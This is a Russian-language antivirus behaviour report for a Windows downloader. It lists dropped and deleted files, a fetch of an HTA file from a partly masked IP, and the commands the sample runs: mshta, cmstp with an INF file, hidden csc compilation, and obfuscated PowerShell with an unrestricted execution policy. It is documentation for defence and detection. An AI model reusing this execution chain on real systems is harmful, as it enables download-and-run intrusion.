Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\output.hta
- C:\users\public\settings.inf
- C:\users\public\suzn.ps1
- %TEMP%\shywfikb.0.cs
- %TEMP%\shywfikb.cmdline
- %TEMP%\shywfikb.out
- %TEMP%\csc8fc1.tmp
- %TEMP%\res8fd1.tmp
- %TEMP%\shywfikb.dll
Удаляет следующие файлы
- %TEMP%\res8fd1.tmp
- %TEMP%\csc8fc1.tmp
- %TEMP%\shywfikb.cmdline
- %TEMP%\shywfikb.out
- %TEMP%\shywfikb.pdb
- %TEMP%\shywfikb.dll
- %TEMP%\shywfikb.0.cs
Сетевая активность
Подключается к
- '94.##4.172.166':80
TCP
Запросы HTTP GET
- http://94.##4.172.166/yxxr/output.hta
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted -File C:\Users\Public\SUzn.ps1
Запускает на исполнение
- '%WINDIR%\syswow64\mshta.exe' "%APPDATA%\output.hta"
- '%WINDIR%\syswow64\cmstp.exe' C:\Users\Public\settings.inf /au
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\shywfikb.cmdline" (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8FD1.tmp" "%TEMP%\CSC8FC1.tmp" (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function YDatARyhS($MLoTVRrz, $xCbltCfZ){[IO.File]::WriteAllBytes($MLoTVRrz, $xCbltCfZ)};function wcBErvk($MLoTVRrz){if($MLoTVRrz.EndsWith((utgfb @(38634,38688,386... (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted -File C:\Users\Public\SUzn.ps1 (со скрытым окном)
